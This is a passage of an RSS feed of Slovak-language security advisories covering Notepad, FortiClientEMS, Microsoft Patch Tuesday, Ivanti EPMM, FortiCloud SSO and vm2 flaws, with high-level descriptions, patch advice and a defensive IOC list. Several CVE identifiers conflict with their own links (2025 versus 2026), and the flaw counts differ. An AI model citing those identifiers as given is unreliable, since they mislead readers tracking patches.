										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/02/notepad-1.jpg" alt="" /></p>
<p>Spoločnosť Microsoft v rámci <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2026-patch-tuesday-fixes-6-zero-days-58-flaws/" target="_blank" rel="noreferrer noopener">Patch Tuesday</a> vo februári 2026 opravila vysoko závažnú bezpečnostnú zraniteľnosť v textovom editore Windows Notepad.  CVE-2026-20841 umožňuje vzdialené vykonanie kódu prostredníctvom dokumentu Markdown.</p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows Notepad</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-20841</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť aplikácie Notepad s&nbsp;označením CVE-2026-20841 spočíva v nesprávnej neutralizácii špeciálnych prvkov. Vzdialený neautorizovaný útočník by ju mohol zneužiť podvrhnutím špeciálne vytvorených súborov typu Markdown na vzdialené vykonanie kódu v kontexte obete.</p>



<p>Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí kliknúť na URL odkaz v&nbsp;dokumente typu Markdown, otvorenom v&nbsp;aplikácii Notepad.</p>



<p>Na uvedenú zraniteľnosť je dostupný tzv. návod Proof-of-Concept demonštrujúci princíp jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom odporúčame vykonať bezodkladnú <a href="https://apps.microsoft.com/detail/9msmlrh6lzf3?hl=en-US&amp;gl=US" target="_blank" rel="noreferrer noopener">aktualizáciu aplikácie</a> Windows Notepad.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20841" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2026-20841</a></li>



<li><a href="https://www.bleepingcomputer.com/news/microsoft/windows-11-notepad-flaw-let-files-execute-silently-via-markdown-links/" target="_blank" rel="noreferrer noopener">https://www.bleepingcomputer.com/news/microsoft/windows-11-notepad-flaw-let-files-execute-silently-via-markdown-links/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3090/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť FortiClientEMS 7.4.4</title>
		<link>/posts/3085</link>
					<comments>/posts/3085#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 11 Feb 2026 14:29:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[FortiClient]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3085</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Fortinet FortiClientEMS verzie 7.4.4 obsahuje zraniteľnosť, ktorá umožňuje vykonávať SQL injekciu prostredníctvom nesanitizovaných HTTP požiadaviek. Vzdialený neautorizovaný útočník môže získať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Fortinet FortiClientEMS verzie 7.4.4 obsahuje zraniteľnosť, ktorá umožňuje vykonávať SQL injekciu prostredníctvom nesanitizovaných HTTP požiadaviek. Vzdialený neautorizovaný útočník môže získať schopnosť vykonávať kód a&nbsp;príkazy.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiClientEMS 7.4.4</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-21643</strong><strong> (CVSS skóre 9,8)</strong></p>



<p>Vývojári spoločnosti Fortinet opravili kritickú zraniteľnosť FortiClientEMS, ktorá súvisí s nedostatočnou sanitizáciou používateľských dát, resp. absentujúcou neutralizáciou špeciálnych znakov. Zraniteľnosť umožňuje injektovať do HTTP požiadaviek príkazy SQL. Vzdialený neautorizovaný útočník tak môže vykonávať pomocou SQL injekcie príkazy a kód.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia FortiClientEMS aspoň na verziu 7.4.5</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21643" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2026-21643</a></li>



<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-1142" target="_blank" rel="noreferrer noopener">https://fortiguard.fortinet.com/psirt/FG-IR-25-1142</a></li>



<li><a href="https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html" target="_blank" rel="noreferrer noopener">https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3085/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft vo februárovom balíku aktualizácií Patch Tuesday opravil 2 kritické a šesť aktívne zneužívaných zraniteľností</title>
		<link>/posts/3083</link>
					<comments>/posts/3083#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 11 Feb 2026 14:26:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=3083</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala vo februári 2026 balík opráv pre portfólio svojich produktov opravujúci 54 zraniteľností, z&#160;ktorých 2 spoločnosť označila ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala vo februári 2026 balík opráv pre portfólio svojich produktov opravujúci 54 zraniteľností, z&nbsp;ktorých 2 spoločnosť označila ako kritické. Tieto umožňujú získať citlivé informácie a eskalovať oprávnenia. Šesť opravených zraniteľností je aktívne zneužívaných a&nbsp;umožňujú eskalovať oprávnenia útočníka, obchádzať bezpečnostné prvky a&nbsp;zneprístupniť službu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 10.0 installed on Linux</li>



<li>.NET 10.0 installed on Mac OS</li>



<li>.NET 10.0 installed on Windows</li>



<li>.NET 8.0 installed on Linux</li>



<li>.NET 8.0 installed on Mac OS</li>



<li>.NET 8.0 installed on Windows</li>



<li>.NET 9.0 installed on Linux</li>



<li>.NET 9.0 installed on Mac OS</li>



<li>.NET 9.0 installed on Windows</li>



<li>Azure AI Language Authoring</li>



<li>Azure DevOps Server 2022</li>



<li>Azure HDInsight</li>



<li>Azure IoT Explorer</li>



<li>Azure Local</li>



<li>GitHub Copilot Plugin for JetBrains IDEs</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft ACI Confidential Containers</li>



<li>Microsoft Defender for Endpoint for Linux</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Exchange Server 2016 Cumulative Update 23</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 14</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 15</li>



<li>Microsoft Exchange Server Subscription Edition RTM</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft Outlook 2016 (32-bit edition)</li>



<li>Microsoft Outlook 2016 (64-bit edition)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2022 version 17.14</li>



<li>Microsoft Visual Studio 2022 version 18.3</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>Office Online Server</li>



<li>Power BI Report Server</li>



<li>Visual Studio Code</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows 11 Version 25H2 for ARM64-based Systems</li>



<li>Windows 11 Version 25H2 for x64-based Systems</li>



<li>Windows 11 Version 26H1 for ARM64-based Systems</li>



<li>Windows 11 version 26H1 for x64-based Systems</li>



<li>Windows App for Mac</li>



<li>Windows Notepad</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>V&nbsp;rámci februárového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 54 zraniteľností. Z nich 2 zaradila spoločnosť Microsoft do kategórie kritické a&nbsp;51 bolo vyhodnotených ako vysoko závažné („Important“). Šesť zraniteľností&nbsp;je aktívne zneužívaných. Kritické zraniteľnosti umožňujú získať citlivé informácie a eskalovať oprávnenia.</p>



<p><strong>CVE-2025-21510</strong><strong> (CVSS skóre 8,8)</strong></p>



<p><strong>Aktívne zneužívaná</strong> vysoko závažná zraniteľnosť sa nachádza v&nbsp;bezpečnostnom mechanizme Windows Shell. Vzdialený neautorizovaný útočník by ju mohol zneužiť podvrhnutím špeciálne vytvorených URL odkazov alebo súborov na obídenie Windows SmartScreen a&nbsp;bezpečnostných výziev. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí otvoriť špeciálne vytvorený súbor alebo URL odkaz.</p>



<p><strong>CVE-2026-21513 </strong><strong>(CVSS skóre 8,8)</strong></p>



<p><strong>Aktívne zneužívaná</strong> zraniteľnosť bezpečnostného mechanizmu MSHTML Framework. Vzdialený neautorizovaný útočník ju môže zneužiť na jeho obídenie a&nbsp;prípadne môže získať schopnosť vykonávať kód. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí otvoriť špeciálne vytvorený súbor alebo URL odkaz.</p>



<p><strong>CVE-2025-</strong><strong>21514</strong><strong> (CVSS skóre 7,8)</strong></p>



<p><strong>Aktívne zneužívaná</strong> zraniteľnosť v Microsoft Word spočíva v&nbsp;závislosti bezpečnostných rozhodovaní na nedôveryhodných vstupoch. Neautorizovaný útočník ju môže lokálne zneužiť podvrhnutím špeciálne vytvorených súborov Office na obídenie bezpečnostných mechanizmov na ochranu pred zraniteľnými komponentami COM/OLE. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí škodlivý súbor otvoriť.</p>



<p><strong>CVE-2025-</strong><strong>21519</strong><strong> (CVSS skóre 7,8)</strong></p>



<p><strong>Aktívne zneužívaná</strong> zraniteľnosť v komponente Desktop Window Manager môže lokálny útočník s&nbsp;nízkymi oprávneniami zneužiť na eskaláciu oprávnení na úroveň SYSTEM. Zraniteľnosť súvisí so zámenou typu premennej.</p>



<p><strong>CVE-2025-</strong><strong>21525</strong><strong> (CVSS skóre 6,2)</strong></p>



<p><strong>Aktívne zneužívaná</strong> zraniteľnosť vo Windows Remote Access Connection Manager spočíva v dereferencii nulového ukazovateľa. Lokálny neautorizovaný útočník by ju mohol zneužiť na zneprístupnenie služby.</p>



<p><strong>CVE-2025-</strong><strong>21533</strong><strong> (CVSS skóre 7,8)</strong></p>



<p><strong>Aktívne zneužívaná </strong>zraniteľnosť vo Windows Remote Desktop by lokálny autorizovaný útočník mohol zneužiť na pridanie nových používateľských kont do skupiny Administrator. Útočník môže eskalovať svoje privilégiá až na úroveň SYSTEM.</p>



<p>Zraniteľnosti <strong>CVE-2026-21522</strong> a <strong>CVE-2026-23655</strong> v Azure Compute Gallery, ktoré spoločnosť označila ako <strong>kritické</strong>, možno zneužiť na eskaláciu privilégií, neoprávnený prístup k citlivým údajom, vrátane tokenov a kľúčov.<strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong><strong></strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo <a href="https://msrc.microsoft.com/update-guide/" target="_blank" rel="noreferrer noopener">stránky výrobcu</a>. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac február a Mode „Update Tuesday“. Bližšie informácie nájdete aj <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Oct" target="_blank" rel="noreferrer noopener">tu</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2026-patch-tuesday-fixes-6-zero-days-58-flaws/" target="_blank" rel="noreferrer noopener">https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2026-patch-tuesday-fixes-6-zero-days-58-flaws/</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-us" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-us</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533</a></li>
</ul>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3083/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zero-day zraniteľnosti v produkte Ivanti Endpoint Manager Mobile</title>
		<link>/posts/3076</link>
					<comments>/posts/3076#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 05 Feb 2026 14:23:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[EPMM]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3076</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre Ivanti Endpoint Manager Mobile, ktoré opravujú dve aktívne zneužívané kritické zero-day zraniteľnosti. CVE-2026-1281 a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre Ivanti Endpoint Manager Mobile, ktoré opravujú dve aktívne zneužívané kritické zero-day zraniteľnosti. CVE-2026-1281 a CVE-2026-1340 umožňujú injekciu kódu. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Endpoint Manager Mobile 12.5.0.0&nbsp;a&nbsp;staršie &nbsp;</li>



<li>Ivanti Endpoint Manager Mobile 12.6.0.0&nbsp;a&nbsp;staršie</li>



<li>Ivanti Endpoint Manager Mobile 12.7.0.0 a staršie</li>



<li>Ivanti Endpoint Manager Mobile 12.5.1.0 a staršie</li>



<li>Ivanti Endpoint Manager Mobile 12.6.1.0 a staršie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-1281, CVE-2026-1340 </strong>&nbsp;(CVSS 3.1 skóre 9.8)</p>



<p>Kritické zraniteľnosti&nbsp; s identifikátormi CVE-2026-1281 a CVE-2026-1340 súvisia s nedostatočným zabezpečením premenných, čo umožňuje plniť ich používateľským vstupom. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na vykonanie kódu zaslaním špeciálne vytvorených požiadaviek HTTP GET.</p>



<p>Zraniteľnosti sú aktívne zneužívané.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Ivanti odporúča bezodkladnú aplikáciu záplat RPM_12.x.0.x alebo RPM_12.x.1.x na zraniteľné systémy, podľa <a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US">používanej verzie</a>. Tieto však treba opätovne aplikovať po každej ďalšej aktualizácii.</p>



<p>Permanentná oprava bude implementovaná v&nbsp;pripravovanej verzii 12.8.0.0.</p>



<p>Odporúča aj kontrolu dostupných logov na prítomnosť pokusov o zneužitie zraniteľnosti podľa návodu na svojej <a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US">stránke</a>. V prípade podozrenia na kompromitáciu zariadení sa odporúča rollback na overenú zálohu alebo úplná reinštalácia systému, zmena prihlasovacích údajov a kryptografického materiálu.&nbsp;</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1281">https://nvd.nist.gov/vuln/detail/CVE-2026-1281</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1340">https://nvd.nist.gov/vuln/detail/CVE-2026-1340</a></li>



<li><a href="https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/">https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3076/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fortinet opravil aktívne zneužívanú kritickú zraniteľnosť vo FortiCloud SSO</title>
		<link>/posts/3072</link>
					<comments>/posts/3072#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 29 Jan 2026 13:28:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[FortiAnalyzer]]></category>
		<category><![CDATA[FortiManager]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiOS]]></category>
		<category><![CDATA[FortiProxy]]></category>
		<category><![CDATA[FortiWeb]]></category>
		<guid isPermaLink="false">/?p=3072</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie FortiOS, FortiManager, FortiProxy a FortiAnalyzer, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť vo FortiCloud SSO. CVE-2026-24858...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie FortiOS, FortiManager, FortiProxy a FortiAnalyzer, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť vo FortiCloud SSO. CVE-2026-24858 by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie autentifikácie na zraniteľné zariadenia.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiAnalyzer 7.6.0 až 7.6.5</li>



<li>FortiAnalyzer 7.4.0 až 7.4.9</li>



<li>FortiAnalyzer 7.2.0 až 7.2.11</li>



<li>FortiAnalyzer 7.0.0 až 7.0.15</li>



<li>FortiManager 7.6.0 až 7.6.5</li>



<li>FortiManager 7.4.0 až 7.4.9</li>



<li>FortiManager 7.2.0 až 7.2.11</li>



<li>FortiManager 7.0.0 až 7.0.15</li>



<li>FortiOS 7.6.0 až 7.6.5</li>



<li>FortiOS 7.4.0 až 7.4.10</li>



<li>FortiOS 7.2.0 až 7.2.12</li>



<li>FortiOS 7.0.0 až 7.0.18</li>



<li>FortiProxy 7.6.0 až 7.6.4</li>



<li>FortiProxy 7.4.0 až 7.4.12</li>



<li>FortiProxy 7.2.0 až 7.2.15</li>



<li>FortiProxy 7.0.0 až 7.0.22</li>



<li>FortiWeb 8.0.0 až 8.0.3</li>



<li>FortiWeb 7.6.0 až 7.6.6</li>



<li>FortiWeb 7.4.0 až 7.4.11</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2026-24858 </strong>(CVSS 3.0 skóre 9,8)</p>



<p>Aktívne zneužívanú kritickú zraniteľnosť FortiOS, FortiManager, FortiAnalyzer, FortiProxy, FortiWeb s&nbsp;identifikátorom CVE-2026-24858 by vzdialený neautentifikovaný útočník mohol zneužiť na získanie prístupu do zariadení registrovaných na cudzie účty, ktoré majú povolenú autentifikáciu FortiCloud SSO. Na to potrebuje účet na službe FortiCloud a&nbsp;registrované zariadenie od spoločnosti Fortinet.</p>



<p>Prihlasovanie pomocou FortiCloud SSO nie je štandardne predkonfigurované, no aktivuje sa po zaregistrovaní zariadenia do služby FortiCare cez grafické rozhranie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru zraniteľných zariadení aspoň na verziu:</p>



<ul>
<li>FortiAnalyzer 7.6.6, 7.4.10, 7.2.12 alebo 7.0.16</li>



<li>FortiManager 7.6.6, 7.4.10, 7.2.12 alebo 7.0.16</li>



<li>FortiOS 7.6.6, 7.4.11, 7.2.13 alebo 7.0.19</li>



<li>FortiProxy 7.6.6, 7.4.13, 7.2.16 alebo 7.0.23</li>



<li>FortiWeb 8.0.4, 7.6.7 alebo 7.4.12</li>
</ul>



<p>V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno pre FortiManager a&nbsp;FortiAnalyzer <a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-060">mitigovať</a> deaktiváciou prihlasovania prostredníctvom FortiCloud SSO a limitovaním prístupu k manažmentovému rozhraniu zariadenia len na zoznam dôveryhodných IP adries. Služba FortiCloud SSO nepodporuje pokusy o prihlásenie zo zraniteľných klientov, preto pre ne netreba vykonať žiadnu aktivitu.</p>



<p>Odporúčame tiež skontrolovať logy na prítomnosť IOC a pokusy o zneužitie zraniteľnosti. V prípade ich detekcie možno zariadenie považovať za kompromitované.</p>



<p><strong>IOC:</strong></p>



<p>E-mail<br>cloud-init[at]mail[.]io<br>cloud-noc[at]mail[.]io<br>IP address<br>104.28.244[.]115<br>104.28.212[.]114<br>104.28.195[.]105<br>104.28.195[.]106<br>104.28.212[.]115<br>104.28.227[.]106<br>104.28.227[.]105<br>104.28.244[.]114<br>37.1.209[.]19<br>217.119.139[.]50<br>Account name<br>audit<br>backup<br>itadmin<br>secadmin<br>support<br>backupadmin<br>deploy<br>remoteadmin<br>security<br>svcadmin<br>system</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios" target="_blank" rel="noreferrer noopener">https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios</a>&nbsp;</li>



<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-060">https://fortiguard.fortinet.com/psirt/FG-IR-26-060</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24858">https://nvd.nist.gov/vuln/detail/CVE-2026-24858</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3072/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť vm2 pre Node.js umožňuje obísť sandboxing</title>
		<link>/posts/3066</link>
					<comments>/posts/3066#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 28 Jan 2026 12:14:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Node.js]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wm2]]></category>
		<guid isPermaLink="false">/?p=3066</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/01/Node.js-1024x652.png" alt="" /></p>Vývojári knižnice vm2 pre Node.js s funkcionalitou sandboxingu opravili kritickú chybu, ktorá útočníkom umožňuje uniknúť zo sandboxu a vykonávať ľubovoľný kód. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/01/Node.js-1024x652.png" alt="" /></p>
<p><strong>Vývojári knižnice vm2 pre Node.js s funkcionalitou sandboxingu opravili kritickú chybu, ktorá útočníkom umožňuje uniknúť zo sandboxu a vykonávať ľubovoľný kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Node.js vm2 verzia 3.10.0 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-22709</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť knižnice Node.js vm2 pre sandboxing nedôveryhodného obsahu umožňuje obchádzať sanitizáciu volaní <em>Promise.prototype.then</em> a <em>Promise.prototype.catch</em>. Lokálne volania funkcií sú ošetrené, avšak globálne nie. Útočníci tak môžu obísť hlavnú funkciu knižnice, uniknúť zo sandboxu a vykonávať ľubovoľný kód.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Vykonávanie ľubovoľného kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Node.js vm2 aspoň na verziu 3.10.2.</p>



<p><strong>Odkazy:</strong></p>



<ul>
